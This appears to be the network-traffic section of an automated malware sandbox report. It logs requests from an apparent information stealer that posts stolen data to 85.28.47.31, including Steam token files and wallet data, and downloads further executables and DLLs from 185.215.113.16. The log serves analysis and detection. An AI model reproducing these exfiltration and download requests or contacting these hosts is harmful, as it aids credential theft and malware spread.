Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d 0a Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file"------AEGIJKEHCAKFCAKFHDAA--
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="message"wallets------BGCAAFHIEBKJKEBFIEHD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="message"ybncbhylepme------KFHCAEGCBFHJDGCBFHDA--
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="message"files------AKKECAFBFHJDGDHIEHJD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FHDAFIIDAKJDGDHIDAKJ--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000025001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 2d 2d 0d 0a Data Ascii: ------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="build"sila------GDBFCGIIIJDBGCBGIDGI--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000027001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000028001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
